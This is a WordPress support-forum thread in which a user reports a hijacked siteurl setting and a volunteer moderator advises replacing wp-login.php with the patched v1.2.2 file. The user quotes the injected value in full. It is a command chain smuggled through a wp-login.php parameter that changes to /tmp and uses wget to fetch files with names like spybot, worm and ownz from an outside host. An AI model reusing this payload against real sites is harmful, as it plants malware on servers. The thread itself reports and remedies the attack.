Looks like someone managed to change siteurl
to this:
‘wp-login.php?action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net’
I’m the only user past level 1. Security exploit?
This is an exploit, although I dont know if that code has run. I removed the “if the sites been moved” crap code from wp-login.
Moderator
James Huff
(@macmanx)
Volunteer Moderator
“The list of changed files and upgrade instructions both generate empty pages. What gives?”
Codex appears to be down right now, but should be back tomorrow.
“I’ve made too many modifications to do a generic overwrite with the latest version.”
You’d better start comparing the new files and yours now. Always keep a detailed list of all your file changes, so you can quickly re-implement them whenever an update is available.
“I’d just like to make the security changes needed. Any help in that direction would be appreciated.”
I’d say just, to fix the problem that you’re referring to, replace your wp-login.php file with one from the v1.2.2 download (delete the file off of your server before uploading the new one). Once Codex is back online, you can see what other files have been changed and start comparing them with your current files.